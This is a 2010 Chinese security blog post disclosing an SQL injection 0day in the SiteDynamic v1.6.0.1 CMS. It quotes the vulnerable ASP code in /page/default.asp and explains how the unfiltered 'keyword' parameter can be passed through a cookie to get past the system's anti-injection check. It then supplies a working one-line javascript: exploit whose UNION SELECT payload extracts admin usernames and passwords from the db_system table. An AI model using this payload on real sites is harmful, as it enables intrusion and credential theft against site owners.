SiteDynamic v1.6.0.1 Sql Injection 0day

2010, April 2, 3:11 PM. 漏洞分析
Submitted by admin

文/My5t3ry
SiteDynamic企业网站管理系统 v1.6.0.1我就不多说了,用的站也不多,帮朋友挖的洞,论坛上熙雅就发过它用的fckeditor编辑器的上传漏洞。废话不多说,看代码:


001//   /page/default.asp    5-122行 

002   

003   

004 <% 

005 pageID=strCLng(Trim(Request("pageID"))) 

006 ID=strCLng(Trim(Request("ID"))) 

007   

008 If isNumeric(pageID) = False Then

009         FoundErr=True

010         Message=Message & "<li>参数错误!</li>"

011 End If

012   

013 if FoundErr<>True then 

014   

015 if ID=0 then 

016   

017         If pageID<>0 Then

018                 set rs=server.CreateObject("adodb.recordset") 

019                 sql="Select * from db_channel where pageID="&pageID 

020                 rs.open sql,conn,1,1 

021                 pageName=rs("pageName") 

022                 description=rs("description") 

023                 keywords=rs("keywords") 

024                 pic=rs("pic") 

025                 link=rs("link") 

026                 PageMode=rs("PageMode") 

027                 PageAmount=rs("PageAmount") 

028                 PageLine=rs("PageLine") 

029                 intro=rs("intro") 

030   

031                 If Not rs.Eof Then

032                         if rs("pageID")>0 then 

033                                 if rs("ChiID")>0 then 

034                                         strChiID=""

035                                         set strRs=conn.execute("select pageID from db_channel where ParentID=" & rs("pageID") & " or ParentPath like '" & rs("ParentPath") & "," & rs("pageID") & ",%'") 

036           

037                                         do while not strRs.eof 

038                                                 if strChiID="" then 

039                                                         strChiID=strRs(0) 

040                                                 else 

041                                                         strChiID=strChiID & "," & strRs(0) 

042                                                 end if 

043                                                 strRs.movenext 

044                                         loop 

045                                 else 

046                                         strChiID=pageID 

047                                 end if 

048                         end if 

049                 end If

050                 rs.close 

051                 set rs=nothing 

052           

053                 sql="select * from db_page Where pageID in ("&strChiID&")"

054         Else

055                 sql="select * from db_page where 1=1"

056         End If

057 else 

058                 sql="select * from db_page where ID="&ID&""

059 End if 

060   

061 if not (Trim(Request("keyword"))="" or isempty(Trim(Request("keyword"))) ) then 

062         sql=sql&" and (title like '%" & Trim(Request("keyword")) & "%' or content like  '%" & Trim(Request("keyword")) & "%')"    //bugs 

063 end if 

064   

065 sql=sql&" order by dateandtime desc"

066 'response.write sql 

067 'response.end 

068 set rs=server.CreateObject("adodb.recordset") 

069 rs.open sql,conn,1,1 

070   

071 if ID<>0 then 

072         if Trim(rs("PageMode"))=4 then 

073                 response.redirect Trim(rs("URL")) 

074         end if 

075         '文件类型 

076         if Trim(rs("PageMode"))=3 then 

077                 filesURL=Trim(rs("files")) 

078                 If filesURL = "" Then

079                         response.write "No data!"

080                 End If

081                 Call Getdownload(filesURL) 

082         end if 

083   

084         srtTitle=Trim(rs("Title")) 

085         srtPageID=Trim(rs("pageID")) 

086         description=rs("description") 

087         keywords=rs("keywords") 

088 end if 

089   

090 sub getTitle() 

091         if pageID=0 and ID=0 then 

092                 response.write "全文检索"

093         elseif pageID<>0 then 

094                 response.write ""&pageName&""

095         elseif ID<>0 then 

096                 response.write "" & srtTitle & ""

097         end if 

098 end sub 

099   

100 sub getadoTitle() 

101         if pageID=0 and ID=0 then 

102                 response.write "全文检索"

103         elseif pageID<>0 then 

104                 response.write ""&pageName&""

105         elseif ID<>0 then 

106                 doPageID=rs("PageID") 

107                 set doRs=server.CreateObject("adodb.recordset") 

108                 Set doRs=conn.Execute("Select * From db_channel Where pageID="&doPageID) 

109                 response.write "" & Trim(doRs("pageName")) & ""

110         end if 

111 end sub 

112   

113 sub getLocation() 

114         if pageID=0 and ID=0 then 

115                 response.write "-&gt;&gt;全文检索"

116         elseif ID<>0 then 

117                 call Nav(srtPageID) 

118         else 

119                 call Nav(pageID) 

120         end if 

121 end sub


 
这套系统包含了防注系统,但只检测request.QueryString,request.form ,上面代码中keyword是通过request()获取的,所以可以用cookies来绕过防注。

利用代码

 

javascript:alert(document.cookie="keyword=" + escape("a%') union select 1,2,3,username&chr(124)&Password,5,6,7,8,9,0,1,2,3,4,5,6 from db_system union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 from db_page where 1=2 and (title like '%a"));location.href="/page/Default.asp?pageID=0";

 
漏洞很简单,没什么好说的,要说的一点就是很多朋友遇到搜索型的注入都是直接盲注了,其实只要闭合的好,还是可以使用union的。
 
PS:重点在于利用的技巧 。。注入语句的写法

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):